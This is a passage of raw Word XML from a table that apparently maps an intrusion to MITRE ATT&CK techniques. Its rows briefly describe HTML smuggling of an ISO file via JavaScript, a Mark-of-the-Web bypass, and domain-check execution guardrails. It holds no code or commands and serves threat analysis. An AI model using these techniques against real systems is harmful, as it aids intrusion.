          </w:tcPr>
          <w:p w14:paraId="0AD59CC1" w14:textId="395D33B8" w:rsidR="0015702A" w:rsidRPr="008D6D8A" w:rsidRDefault="0015702A" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>[2] See above/below</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="200542A4" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31364314" w14:textId="0692E6D5" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09B815E2" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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762C3ABE" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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3" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19D67B58" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5548BD1D" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38D808E2" w14:textId="7570F017" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54469D3C" w14:textId="7FE30488" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-SEN/NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="340ADE77" w14:textId="38E8CC99" w:rsidR="000C0ACD" w:rsidRPr="008D6D8A" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD" w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>User executes HTML malicious HTML file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00743E00" w14:paraId="43779EBC" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF23F25" w14:textId="509703C2" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A6D4E5A" w14:textId="14FDDC80" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00743E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00743E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00743E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E63995A" w14:textId="31A67635" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00743E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1059.007 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00743E00">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Command and Scripting Interpreter: JavaScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DFEF68C" w14:textId="4C282D74" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7766A680" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="067B31EA" w14:textId="1D60C3F8" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39454595" w14:textId="29A74669" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/IF-SEN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318B2E2F" w14:textId="3C2BD263" w:rsidR="000C0ACD" w:rsidRPr="00743E00" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD" w:rsidRPr="0096445D">
              <w:t xml:space="preserve">When opened by the targeted user, a JavaScript within the </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD" w:rsidRPr="0096445D">
              <w:lastRenderedPageBreak/>
              <w:t>HTML wrote an ISO file to disc and encouraged the target to open it</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w14:paraId="7ED6569D" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7515CE11" w14:textId="31B13CC8" w:rsidR="000C0ACD" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="608F4D52" w14:textId="325D6FCE" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74963966" w14:textId="60368B0D" w:rsidR="000C0ACD" w:rsidRPr="000E115A" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="000E115A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1553</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>.005 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="000E115A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Subvert Trust Controls: Mark-of-the-Web Bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4224EC80" w14:textId="7BEA9061" w:rsidR="000C0ACD" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="04FEF768" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70927BE3" w14:textId="1144FCA5" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D91BA73" w14:textId="1D1A7C82" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AAAA058" w14:textId="78AED2DA" w:rsidR="000C0ACD" w:rsidRPr="00B857D7" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD" w:rsidRPr="008D6D8A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>As above ISO embedded in HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w14:paraId="1C1DBB56" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D77B99" w14:textId="756B2A06" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53AD76F2" w14:textId="459706CE" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00022B52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00022B52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>00</w:t>
            </w:r>
            <w:r w:rsidR="002F0F12">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00022B52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">5 </w:t>
            </w:r>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00150521">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00022B52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00022B52">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Evasion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40B8FE00" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005B3D45">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>T1480 Execution Guardrails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13F528E9" w14:textId="6F93F0F4" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45C0158E" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400AD633" w14:textId="1E9CF8E5" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F2F1D21" w14:textId="7B894DEE" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="00F57E37" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D7D5475" w14:textId="373DCA8C" w:rsidR="000C0ACD" w:rsidRPr="00022B52" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:r>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD">
              <w:t>The actor sometimes employed checks for specific internal Active Directory domains that would terminate execution of the malicious process if it identified an unintended environment.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w14:paraId="4B4AEC2C" w14:textId="77777777" w:rsidTr="000C0ACD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3425AC5A" w14:textId="5072AA5A" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2451D6E2" w14:textId="7D39AB71" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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463" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72AD5BF0" w14:textId="40AF7B9B" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">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63" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7FACFD18" w14:textId="39594210" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="008D4257" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630A4DEC" w14:textId="77777777" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="684" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="496C204B" w14:textId="3DB5BF37" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="000C0ACD" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A768C1D" w14:textId="1AEC7814" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="00131E77" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2409" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="20E9FAE5" w14:textId="3A226B03" w:rsidR="000C0ACD" w:rsidRPr="005B3D45" w:rsidRDefault="00CD088D" w:rsidP="000C0ACD">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD088D">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[2] </w:t>
            </w:r>
            <w:r w:rsidR="000C0ACD" w:rsidRPr="00CD088D">
              <w:rPr>
